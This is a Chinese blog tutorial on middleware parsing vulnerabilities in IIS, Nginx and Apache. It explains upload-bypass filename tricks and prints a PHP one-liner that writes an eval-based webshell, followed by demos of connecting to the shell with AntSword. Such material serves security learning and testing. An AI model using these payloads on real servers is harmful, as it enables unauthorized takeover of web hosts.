中间件的解析漏洞详解及演示
本文轉(zhuǎn)自行云博客https://www.xy586.top/
文章目錄
-
-
- IIS5.x-6.x解析漏洞
- Apache
- IIS 7.0/IIS 7.5/nginx 0.8.3解析漏洞
- Nginx <0.8.03 空字節(jié)代碼執(zhí)行漏洞
- 演示
- IIS6.0解析漏洞
- Nginx 漏洞
- Apache解析漏洞
-
?
解析漏洞是指web服務(wù)器因?qū)ttp請(qǐng)求處理不當(dāng)導(dǎo)致將非可執(zhí)行的腳本,文件等當(dāng)做可執(zhí)行的腳本,文件等執(zhí)行。該漏洞一般配合服務(wù)器的文件上傳功能使用,以獲取服務(wù)器的權(quán)限。
類型:
IIS 5.x/6.0解析漏洞
IIS 7.0/IIS 7.5/
Nginx <0.8.3畸形解析漏洞
Nginx <8.03?空字節(jié)代碼執(zhí)行漏洞
Apache解析漏洞
IIS5.x-6.x解析漏洞
利用方法
IIS6.0 默認(rèn)的可執(zhí)行文件除了asp還包含這三種
/sp.asa
/sp.cer
/sp.cdx
1.目錄解析
/xx.asp/xx.jpg
2.文件解析
sp.asp;.jpg
第一種,在網(wǎng)站下建立文件夾的名字為 .asp、.asa 的文件夾,其目錄內(nèi)的任何擴(kuò)展名的文件都被IIS當(dāng)作asp文件來解析并執(zhí)行。
例如創(chuàng)建目錄 sp.asp,那么
/sp.asp/1.jpg
將被當(dāng)作asp文件來執(zhí)行。假設(shè)黑客可以控制上傳文件夾路徑,就可以不管你上傳后你的圖片改不改名都能拿shell了。
第二種,在IIS6.0下,分號(hào)后面的不被解析,也就是說
sp.asp;.jpg
會(huì)被服務(wù)器看成是sp.asp
Apache
漏洞原理
Apache 解析文件的規(guī)則是從右到左開始判斷解析,如果后綴名為不可識(shí)別文件解析,就再往左判斷。比如 sec.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識(shí)別解析,apache就會(huì)把sec.php.owf.rar解析成php.
如何判斷是不是合法的后綴就是這個(gè)漏洞的利用關(guān)鍵,測(cè)試時(shí)可以嘗試上傳一個(gè)sec.php.rara.jpg.png…(把你知道的常見后綴都寫上…)去測(cè)試是否是合法后綴
其余配置問題導(dǎo)致漏洞
(1)如果在 Apache 的 conf 里有這樣一行配置 AddHandler php5-script .php 這時(shí)只要文件名里包含.php 即使文件名是 test2.php.jpg 也會(huì)以 php 來執(zhí)行。
(2)如果在 Apache 的 conf 里有這樣一行配置 AddType application/x-httpd-php .jpg 即使擴(kuò)展名是 jpg,一樣能以 php 方式執(zhí)行。
IIS 7.0/IIS 7.5/nginx 0.8.3解析漏洞
在默認(rèn)Fast-CGI開啟狀況下,黑客上傳一個(gè)名字為sp.jpg,內(nèi)容為
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>- 1
的文件,然后訪問sp.jpg/.php,在這個(gè)目錄下就會(huì)生成一句話木馬 shell.php
Nginx <0.8.03 空字節(jié)代碼執(zhí)行漏洞
影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在圖片中嵌入PHP代碼然后通過訪問
xxx.jpg%00.php
來執(zhí)行其中的代碼
演示
IIS6.0解析漏洞
1.上傳23.asa;jpg文件
蟻劍連接成功
2.將23.asa;jpg文件改名為23.jpg,并放到1.asp目錄下訪問,然后使用蟻劍連接
Nginx 漏洞
上傳一個(gè)圖片馬,里面含有代碼
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>
該木馬會(huì)在上傳后,運(yùn)用Apache的解析漏洞再次訪問時(shí)生成一個(gè)shell.php木馬
訪問該圖片,并在末尾加上/.php
生成shell.php
蟻劍去連接該shell.php
Apache解析漏洞
上傳帶一句話木馬的1.php.q.w.d文件
蟻劍連接
總結(jié)
以上是生活随笔為你收集整理的中间件的解析漏洞详解及演示的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Python如何打包EXE可执行文件
- 下一篇: Mac idea 打不开